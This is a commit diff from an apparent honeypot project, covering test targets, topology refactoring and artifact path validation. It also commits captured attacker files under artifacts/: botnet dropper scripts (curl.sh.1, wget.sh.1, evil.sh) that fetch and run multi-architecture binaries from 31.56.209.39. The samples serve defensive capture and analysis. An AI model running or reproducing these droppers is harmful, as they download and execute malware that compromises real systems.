fix(test/schema): pin xdist_group to prevent multi-server startup, cap workers at 4

fix(deps): pin urllib3>=2.7.0 to resolve CVE-2026-44431 and CVE-2026-44432
feat(test): add test-schema target and SCHEMA_QUICK=1 mode for schemathesis
2026-05-16 18:36:26 -04:00 · 2026-05-16 18:26:47 -04:00 · 2026-05-16 18:25:40 -04:00 · 2026-05-10 22:45:05 -04:00 · 2026-05-10 22:43:33 -04:00 · 2026-05-10 22:39:24 -04:00
963 changed files with 93452 additions and 9225 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -51,3 +51,22 @@ schem

 # pydeps-style dependency graph dumps from local analysis runs.
 deps.txt
+
+# Node modules vendored under decnet/canary/ for the obfuscator helper.
+# The package.json is the source of truth; modules are reinstalled at
+# build/deploy time.
+node_modules/
+package-lock.json
+
+# TTP rule-precision corpus pulled from prod sqlite. Real attacker
+# payloads — operator-only artifact. The synthetic ``seed_*.jsonl`` files
+# alongside ARE committed (re-included by the ``!`` rule) and exercise the harness in CI.
+tests/ttp/rule_precision/corpus/*.jsonl
+!tests/ttp/rule_precision/corpus/seed_*.jsonl
+threatfox-api.json
+
+# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
+enterprise-attack-*.json
+
+# pytest failure dump files
+testfail
--- a/219
+++ b/219
@@ -0,0 +1,219 @@
+PYTEST     := .311/bin/pytest
+FAIL_FAST  ?= 1
+ARGS       :=
+
+# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
+# Unit suites inherit that; special suites clear it with --override-ini.
+UNIT_FLAGS  := --timeout=30 --timeout-method=thread
+SEQ_FLAGS   := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
+FUZZ_FLAGS  := --override-ini="addopts=-v -x" -n logical -m fuzz \
+	--ignore=tests/api/test_schemathesis.py \
+	--ignore=tests/api/test_schemathesis_agent.py \
+	--ignore=tests/api/test_schemathesis_swarm.py \
+	--ignore=tests/api/test_schemathesis_ttp.py
+SCHEMA_QUICK ?= 0
+SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
+BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
+
+# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
+
+.PHONY: test-core
+test-core:
+	$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-web
+test-web:
+	$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-db
+test-db:
+	$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-bus
+test-bus:
+	$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-ttp
+test-ttp:
+	$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-intel
+test-intel:
+	$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-analysis
+test-analysis:
+	$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-infra
+test-infra:
+	$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-fleet
+test-fleet:
+	$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-cli
+test-cli:
+	$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
+
+.PHONY: test-features
+test-features:
+	$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
+
+# ── Go and React suites ───────────────────────────────────────────────────────
+
+_GO_MODULES := \
+	decnet/templates/_caddy_modules/decnetfp \
+	decnet/templates/http/_caddy_modules/decnetfp \
+	decnet/templates/https/_caddy_modules/decnetfp
+
+.PHONY: test-go
+test-go:
+	@failed=""; \
+	for mod in $(_GO_MODULES); do \
+		echo "=== go test: $$mod ==="; \
+		if (cd "$$mod" && go test ./...); then \
+			echo "[PASS] $$mod"; \
+		else \
+			echo "[FAIL] $$mod"; \
+			failed="$$failed $$mod"; \
+			if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
+		fi; \
+	done; \
+	[ -z "$$failed" ]
+
+.PHONY: test-react
+test-react:
+	cd decnet_web && npm run test:run $(ARGS)
+
+# ── Special suites (addopts overridden; per-suite workers and timeouts) ───────
+
+.PHONY: test-live
+test-live:
+	$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-api
+test-api:
+	$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-stress
+test-stress:
+	$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-service
+test-service:
+	$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
+
+.PHONY: test-fuzz
+test-fuzz:
+	$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
+
+.PHONY: test-schema
+test-schema:
+	SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
+		tests/api/test_schemathesis.py \
+		tests/api/test_schemathesis_agent.py \
+		tests/api/test_schemathesis_swarm.py \
+		tests/api/test_schemathesis_ttp.py \
+		$(SCHEMA_FLAGS) $(ARGS)
+
+.PHONY: test-bench
+test-bench:
+	$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
+
+.PHONY: test-docker
+test-docker:
+	DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
+
+# ── Static analysis ───────────────────────────────────────────────────────────
+
+.PHONY: test-mypy
+test-mypy:
+	.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
+
+.PHONY: test-bandit
+test-bandit:
+	.311/bin/bandit -r decnet -c pyproject.toml
+
+.PHONY: test-vulture
+test-vulture:
+	.311/bin/vulture decnet --min-confidence 80
+
+.PHONY: test-pip-audit
+test-pip-audit:
+	.311/bin/pip-audit
+
+# ── Composite: all suites ─────────────────────────────────────────────────────
+
+_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
+               go react \
+               live api schema stress service fuzz bench docker \
+               mypy bandit vulture pip-audit
+
+.PHONY: test-all test
+test-all test:
+	@failed=""; \
+	for suite in $(_ALL_SUITES); do \
+		echo ""; \
+		echo "══════════════════════════ $$suite ══════════════════════════"; \
+		if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
+			echo "[PASS] $$suite"; \
+		else \
+			echo "[FAIL] $$suite"; \
+			failed="$$failed $$suite"; \
+			if [ "$(FAIL_FAST)" = "1" ]; then \
+				echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
+				exit 1; \
+			fi; \
+		fi; \
+	done; \
+	if [ -n "$$failed" ]; then \
+		echo ""; \
+		echo "Failed:$$failed"; \
+		exit 1; \
+	fi; \
+	echo ""; \
+	echo "All suites passed."
+
+.PHONY: help
+help:
+	@echo "Unit suites (xdist, 30s timeout):"
+	@echo "  make test-core      tests/core + config + factories + fixtures"
+	@echo "  make test-web       tests/web + services"
+	@echo "  make test-db        tests/db + vectorstore"
+	@echo "  make test-bus       tests/bus + logging + telemetry"
+	@echo "  make test-ttp       tests/ttp"
+	@echo "  make test-intel     tests/intel + asn + geoip"
+	@echo "  make test-analysis  tests/clustering + correlation"
+	@echo "  make test-infra     tests/agent + collector + sniffer + profiler"
+	@echo "  make test-fleet     tests/fleet + swarm + topology + orchestrator + deploy + updater"
+	@echo "  make test-cli       tests/cli + engine + mutator + realism"
+	@echo "  make test-features  tests/canary + artifacts + webhook + decky_io + prober"
+	@echo ""
+	@echo "Go / React suites:"
+	@echo "  make test-go        go test ./... in each Caddy module variant"
+	@echo "  make test-react     vitest run in decnet_web"
+	@echo ""
+	@echo "Special suites (addopts overridden; workers and timeouts vary per suite):"
+	@echo "  make test-live      tests/live"
+	@echo "  make test-api       tests/api  (schemathesis)"
+	@echo "  make test-stress    tests/stress"
+	@echo "  make test-service   tests/service_testing"
+	@echo "  make test-schema              schemathesis contract tests (-m fuzz, xdist -n 4, 600s timeout)"
+	@echo "  make test-schema SCHEMA_QUICK=1   same, capped at 100 examples per test"
+	@echo "  make test-fuzz      hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
+	@echo "  make test-bench     tests/perf"
+	@echo "  make test-docker    tests/docker  (sets DECNET_LIVE_DOCKER=1)"
+	@echo ""
+	@echo "Static analysis:"
+	@echo "  make test-mypy      mypy type check on decnet/"
+	@echo "  make test-bandit    bandit security scan on decnet/"
+	@echo "  make test-vulture   vulture dead code scan (>=80% confidence)"
+	@echo "  make test-pip-audit pip-audit dependency vulnerability scan"
+	@echo ""
+	@echo "Composites:"
+	@echo "  make test-all       ALL suites (unit + go + react + live + api + schema + stress + service + fuzz + bench + docker + static analysis)"
+	@echo "  make test-all FAIL_FAST=0   same, report all failures instead of stopping"
+	@echo ""
+	@echo "Passthrough: make test-web ARGS='--lf -s'"
--- a/README.md
+++ b/README.md
@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre

 | Slug | Services | OS Fingerprint | Description |
 |---|---|---|---|
+| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
 | `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
 | `windows-server` | smb, rdp, ldap | windows | Windows domain member |
 | `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
 Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.

 ```ini
+[deaddeck-1]
+amount=1
+archetype=deaddeck
+ssh.password=admin
+
 [decky-webmail.http]
 server_header = Apache/2.4.54 (Debian)
 fake_app      = wordpress
--- a/artifacts/curl.sh
+++ b/artifacts/curl.sh
@@ -0,0 +1,3 @@
+[0] Downloading 'http://31.56.209.39/curl.sh' ...
+Saving 'curl.sh.1'
+HTTP response 200 OK [http://31.56.209.39/curl.sh]
--- a/artifacts/curl.sh.1
+++ b/artifacts/curl.sh.1
@@ -0,0 +1,46 @@
+#!/bin/sh
+ulimit -n 4096
+ulimit -n 999999
+ulimit -v 2097152
+cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
+rm -rf odin*
+rm -rf bizy*
+rm -rf rs*
+rm -rf *.sh
+
+#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
+#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
+#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
+#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
+#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
+#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
+#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
+#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
+#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
+#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
+
+curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
+curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
+curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
+curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
+curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
+curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
+curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
+curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
+curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
+curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
+curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
+curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
+curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
+
+curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
+curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
+curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
+curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
+curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
+curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
+curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
+curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
+curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
+curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
+curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
--- a/artifacts/evil.sh
+++ b/artifacts/evil.sh
@@ -0,0 +1,3 @@
+ wget http://31.56.209.39/wget.sh -o wget.sh
+
+ wget http://31.56.209.39/curl.sh -o curl.sh
--- a/artifacts/wget.sh
+++ b/artifacts/wget.sh
@@ -0,0 +1,3 @@
+[0] Downloading 'http://31.56.209.39/wget.sh' ...
+Saving 'wget.sh.1'
+HTTP response 200 OK [http://31.56.209.39/wget.sh]
--- a/artifacts/wget.sh.1
+++ b/artifacts/wget.sh.1
@@ -0,0 +1,46 @@
+#!/bin/sh
+ulimit -n 4096
+ulimit -n 999999
+ulimit -v 2097152
+cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
+rm -rf odin*
+rm -rf bizy*
+rm -rf rs*
+rm -rf *.sh
+
+wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
+wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
+wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
+wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
+wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
+wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
+wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
+wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
+wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
+wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
+
+wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
+wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
+wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
+wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
+wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
+wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
+wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
+wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
+wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
+wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
+wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
+wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
+wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
+
+wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
+wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
+wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
+wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
+wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
+wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
+wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
+wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
+wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
+wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
+wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
--- a/bait/.gitkeep
+++ b/bait/.gitkeep
--- a/bait/README.md
+++ b/bait/README.md
@@ -0,0 +1,5 @@
+# bait/
+
+Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
+
+JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
--- a/decnet.tar
+++ b/decnet.tar
--- a/decnet/agent/executor.py
+++ b/decnet/agent/executor.py
@@ -194,7 +194,7 @@ async def self_destruct() -> None:
        argv = ["/bin/bash", path]
        spawn_kwargs = {"start_new_session": True}

-    subprocess.Popen(  # nosec B603
+    subprocess.Popen(  # type: ignore[call-overload]  # nosec B603
        argv,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
--- a/decnet/agent/heartbeat.py
+++ b/decnet/agent/heartbeat.py
@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
        return None

    try:
-        from decnet import __version__ as _v
+        from decnet import __version__ as _v  # type: ignore[attr-defined]
        agent_version = _v
    except Exception:
        agent_version = "unknown"
--- a/decnet/agent/topology_ops.py
+++ b/decnet/agent/topology_ops.py
@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
    return str(tid)


+def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
+    """Verify hash integrity and structural validity; return topology_id."""
+    local_hash = canonical_hash(hydrated)
+    if local_hash != version_hash:
+        raise HashMismatch(
+            f"master hash {version_hash!r} does not match agent hash "
+            f"{local_hash!r} — refusing to apply"
+        )
+    issues = _validate_topology(hydrated)
+    if _validation_errors(issues):
+        raise ValidationError(issues)
+    return _topology_id(hydrated)
+
+
+async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
+    """Tear down the current topology if it differs from topology_id.
+
+    Master is authoritative — a different pinned topology (fully applied,
+    partially applied, or drifted) is torn down before the new apply proceeds.
+    Refusing with 409 would leave the agent stuck in a state only a human
+    could resolve.
+    """
+    existing = store.current()
+    if existing is None or existing.topology_id == topology_id:
+        return
+    log.info(
+        "superseding topology %s with %s on master authority",
+        existing.topology_id, topology_id,
+    )
+    try:
+        await teardown(existing.topology_id, store)
+    except Exception as exc:  # noqa: BLE001 — we still want to try applying
+        log.warning(
+            "best-effort teardown of superseded topology %s failed: %s",
+            existing.topology_id, exc,
+        )
+        # Hard-clear the store row so the new apply isn't blocked by a
+        # half-torn-down predecessor.  Leftover docker objects surface via
+        # the next heartbeat's observed block.
+        store.clear(existing.topology_id)
+
+
+def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
+    """Create bridge networks, write compose file, and bring up containers.
+
+    Sync/blocking — callers must dispatch via asyncio.to_thread.
+
+    ``--always-recreate-deps`` keeps service containers' netns shares
+    fresh: every decky service joins its base's netns via
+    ``network_mode: container:<base>``, and that share is bound at
+    service start time. If a base is recreated (e.g. when ``ports:``
+    changes after toggling ``forwards_l3``) but compose decides the
+    services are unchanged, the services keep a stale netns FD
+    pointing at the destroyed base — they end up in an empty
+    namespace with only ``lo``, and external traffic hits a closed
+    port on the live base. Forcing dependents to recreate alongside
+    the base is the cheapest way to make this race impossible.
+    """
+    compose_path = _topology_compose_path(topology_id)
+    client = docker.from_env()
+    for lan in hydrated["lans"]:
+        net_name = _topology_network_name(topology_id, lan["name"])
+        create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
+    write_topology_compose(hydrated, compose_path)
+    _compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
+
+
 async def apply(
    hydrated: dict[str, Any],
    version_hash: str,
@@ -73,76 +140,11 @@ async def apply(
      Any docker / compose error propagates up; the endpoint maps it
        to 500 and records the message on the store row.
    """
-    local_hash = canonical_hash(hydrated)
-    if local_hash != version_hash:
-        raise HashMismatch(
-            f"master hash {version_hash!r} does not match agent hash "
-            f"{local_hash!r} — refusing to apply"
-        )
-
-    issues = _validate_topology(hydrated)
-    if _validation_errors(issues):
-        raise ValidationError(issues)
-
-    topology_id = _topology_id(hydrated)
-    # Master is authoritative.  If a different topology is pinned here
-    # — whether it fully applied, only partially applied (failure
-    # marker row + orphan containers), or drifted — teardown first,
-    # then accept the new one.  Refusing with 409 would leave the
-    # agent stuck in a state only a human could resolve.
-    existing = store.current()
-    if existing is not None and existing.topology_id != topology_id:
-        log.info(
-            "superseding topology %s with %s on master authority",
-            existing.topology_id, topology_id,
-        )
-        try:
-            await teardown(existing.topology_id, store)
-        except Exception as exc:  # noqa: BLE001 — we still want to try applying
-            log.warning(
-                "best-effort teardown of superseded topology %s failed: %s",
-                existing.topology_id, exc,
-            )
-            # Hard-clear the store row so the new apply isn't blocked
-            # by a half-torn-down predecessor.  Leftover docker objects
-            # will surface via the next heartbeat's observed block.
-            store.clear(existing.topology_id)
-
-    lans = hydrated["lans"]
-    compose_path = _topology_compose_path(topology_id)
-    client = docker.from_env()
-
-    # Bridges + compose are sync/blocking; hop to a thread so we don't
-    # stall the event loop on a slow docker daemon.
-    def _materialise() -> None:
-        for lan in lans:
-            net_name = _topology_network_name(topology_id, lan["name"])
-            internal = not lan["is_dmz"]
-            create_bridge_network(
-                client, net_name, lan["subnet"], internal=internal
-            )
-        write_topology_compose(hydrated, compose_path)
-        # ``--always-recreate-deps`` keeps service containers' netns shares
-        # fresh: every decky service joins its base's netns via
-        # ``network_mode: container:<base>``, and that share is bound at
-        # service start time. If a base is recreated (e.g. when ``ports:``
-        # changes after toggling ``forwards_l3``) but compose decides the
-        # services are unchanged, the services keep a stale netns FD
-        # pointing at the destroyed base — they end up in an empty
-        # namespace with only ``lo``, and external traffic hits a closed
-        # port on the live base. Forcing dependents to recreate alongside
-        # the base is the cheapest way to make this race impossible.
-        _compose_with_retry(
-            "up", "--build", "-d", "--always-recreate-deps",
-            compose_file=compose_path,
-        )
-
-    await asyncio.to_thread(_materialise)
-
+    topology_id = _check_hash_and_validate(hydrated, version_hash)
+    await _teardown_superseded(topology_id, store)
+    await asyncio.to_thread(_materialise, hydrated, topology_id)
    store.put(topology_id, version_hash, hydrated)
-    log.info(
-        "topology %s applied on agent (%d LANs)", topology_id, len(lans)
-    )
+    log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))


 async def teardown(
--- a/decnet/agent/topology_store.py
+++ b/decnet/agent/topology_store.py
@@ -63,6 +63,7 @@ class TopologyStore:
        # The agent is single-process, so there's no real contention —
        # sqlite's own connection lock is enough.
        self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
+        self._conn.row_factory = sqlite3.Row
        self._conn.execute(
            "CREATE TABLE IF NOT EXISTS applied_topology ("
            " topology_id TEXT PRIMARY KEY,"
@@ -84,11 +85,11 @@ class TopologyStore:
        if row is None:
            return None
        return AppliedRow(
-            topology_id=row[0],
-            applied_version_hash=row[1],
-            hydrated=json.loads(row[2]),
-            applied_at=int(row[3]),
-            last_error=row[4],
+            topology_id=row["topology_id"],
+            applied_version_hash=row["applied_version_hash"],
+            hydrated=json.loads(row["hydrated_blob_json"]),
+            applied_at=int(row["applied_at"]),
+            last_error=row["last_error"],
        )

    # ---------------------------------------------------------------- writes
--- a/decnet/artifacts/init.py
+++ b/decnet/artifacts/init.py
@@ -0,0 +1 @@
+"""Artifact storage helpers shared between the web router and TTP workers."""
--- a/decnet/artifacts/paths.py
+++ b/decnet/artifacts/paths.py
@@ -0,0 +1,86 @@
+"""
+Shared on-disk artifact path resolution.
+
+Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
+quarantine tree:
+
+    /var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
+
+Two callers need to translate ``(decky, stored_as, service)`` into a
+concrete ``Path`` rooted under that tree:
+
+* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
+  (``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
+  download for the dashboard.
+* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
+  reads the stored ``.eml`` at tag-time so body-aware predicates
+  (R0047 BEC, R0048 macro) don't need raw body text on the bus.
+
+Both callers share the same validation rules and the same
+defence-in-depth symlink-escape check; this module is the single
+implementation. It is auth-agnostic — wrappers layer authentication
+where appropriate (the router does ``require_admin``, the lifter does
+not).
+"""
+
+from __future__ import annotations
+
+import os
+import re
+from pathlib import Path
+
+# decky names come from the deployer — lowercase alnum plus hyphens.
+_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
+
+# Services that own an artifacts subdir. Kept explicit so a caller
+# can't pivot into arbitrary subpaths via a query string or bus payload.
+_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
+
+# stored_as is assembled by the capturing template as:
+#   ${ts}_${sha:0:12}_${base}
+# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
+# and base is the original filename's basename. Keep the filename charset
+# tight but allow common punctuation dropped files actually use.
+_STORED_AS_RE = re.compile(
+    r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
+)
+
+# Module-level so tests can monkeypatch. Override via env in production
+# (the systemd unit sets this) — the prod path matches the bind mount
+# declared in decnet/services/{ssh,smtp}.py.
+ARTIFACTS_ROOT = Path(
+    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
+)
+
+
+class ArtifactPathError(ValueError):
+    """Raised when (decky, stored_as, service) fails validation or escapes
+    the artifacts root.
+
+    The router catches this and re-raises HTTPException(400). The lifter
+    catches it and treats the event as having no body available (no-tag).
+    """
+
+
+def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
+    """Validate inputs, resolve the on-disk path, and confirm it stays
+    inside the artifacts root.
+
+    Raises :class:`ArtifactPathError` on any violation. Does NOT check
+    that the file exists — callers handle that distinctly (404 for the
+    router, no-tag for the lifter).
+    """
+    if service not in _ALLOWED_SERVICES:
+        raise ArtifactPathError("invalid service")
+    if not _DECKY_RE.fullmatch(decky):
+        raise ArtifactPathError("invalid decky name")
+    if not _STORED_AS_RE.fullmatch(stored_as):
